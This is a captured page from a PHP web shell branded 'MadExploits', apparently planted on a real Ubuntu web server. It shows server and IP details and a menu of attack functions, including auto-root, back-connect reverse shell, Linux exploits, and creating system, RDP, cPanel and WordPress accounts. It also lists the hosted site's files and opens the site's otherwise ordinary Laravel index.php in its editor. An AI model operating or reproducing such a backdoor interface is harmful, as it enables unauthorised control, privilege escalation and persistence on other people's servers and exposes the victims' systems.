Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.187.74
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
customboxeslane.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
source
[ DIR ]
drwxr-xr-x
.gitignore
624
B
-rw-r--r--
.htaccess
11.39
KB
-rw-r--r--
README.md
21
B
-rw-r--r--
adminer.php
356.21
KB
-rw-r--r--
favicon.ico
0
B
-rw-r--r--
faviicon.png
1.7
KB
-rw-r--r--
google6d39cee1b5e8d3f8.html
53
B
-rw-r--r--
index.php
5.26
KB
-rw-r--r--
robots.txt
389
B
-rw-r--r--
sitemap2.xml
349
B
-rw-r--r--
web.config
1.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php $cv='utm_medium=company_profile&utm_source=trustpilot&utm_campaign=logo_click'; $a='utm_medium=company_profile&utm_source=trustpilot&utm_campaign=domain_click'; $actual_link = "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; if (strpos($actual_link, $cv) !== false) { header('Location: https://customboxeslane.com'); die(); // Redirect('https://example.com/', false); } if (strpos($actual_link, $a) !== false) { header('Location: https://customboxeslane.com'); die(); // Redirect('https://example.com/', false); } $current_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; // Check if the base URL is "oxopackaging.com" and contains the "gclid" parameter if (strpos($current_url, 'customboxeslane.com') !== false && strpos($current_url, 'gclid') !== false && strpos($current_url, '?') === false) { // Redirect to the homepage header('Location: http://customboxeslane.com/'); exit(); // Stop further execution } $current_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; // Check if the base URL is "oxopackaging.com" and contains the "gclid" parameter if (strpos($current_url, 'customboxeslane.com') !== false && strpos($current_url, 'gad_source') !== false && strpos($current_url, '?') === false) { // Redirect to the homepage header('Location: http://customboxeslane.com/'); exit(); // Stop further execution } $current_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; // Check if the base URL is "oxopackaging.com" and contains the "gclid" parameter if (strpos($current_url, 'customboxeslane.com') !== false && strpos($current_url, 'fbclid') !== false && strpos($current_url, '?') === false) { // Redirect to the homepage header('Location: http://customboxeslane.com/'); exit(); // Stop further execution } $current_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; // Check if the base URL is "oxopackaging.com" and contains the "gclid" parameter if (strpos($current_url, 'customboxeslane.com') !== false && strpos($current_url, 'gbraid') !== false && strpos($current_url, '?') === false) { // Redirect to the homepage header('Location: http://customboxeslane.com/'); exit(); // Stop further execution }$current_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; // Check if the base URL is "oxopackaging.com" and contains the "gclid" parameter if (strpos($current_url, 'customboxeslane.com') !== false && strpos($current_url, 'srsltid') !== false && strpos($current_url, '?') === false) { // Redirect to the homepage header('Location: http://customboxeslane.com/'); exit(); // Stop further execution } $current_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; // Check if the base URL is "oxopackaging.com" and contains the "gclid" parameter if (strpos($current_url, 'customboxeslane.com') !== false && strpos($current_url, 'wbraid') !== false && strpos($current_url, '?') === false) { // Redirect to the homepage header('Location: http://customboxeslane.com/'); exit(); // Stop further execution } use Illuminate\Contracts\Http\Kernel; use Illuminate\Http\Request; define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Check If The Application Is Under Maintenance |-------------------------------------------------------------------------- | | If the application is in maintenance / demo mode via the "down" command | we will load this file so that any pre-rendered content can be shown | instead of starting the framework, which could cause an exception. | */ if (file_exists(__DIR__.'/source/storage/framework/maintenance.php')) { require __DIR__.'/source/storage/framework/maintenance.php'; } /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader for | this application. We just need to utilize it! We'll simply require it | into the script here so we don't need to manually load our classes. | */ require __DIR__.'/source/vendor/autoload.php'; /* |-------------------------------------------------------------------------- | Run The Application |-------------------------------------------------------------------------- | | Once we have the application, we can handle the incoming request using | the application's HTTP kernel. Then, we will send the response back | to this client's browser, allowing them to enjoy our application. | */ $app = require_once __DIR__.'/source/bootstrap/app.php'; $kernel = $app->make(Kernel::class); $app->bind('path.public', function() { return __DIR__; }); $response = $kernel->handle( $request = Request::capture() )->send(); $kernel->terminate($request, $response);
Close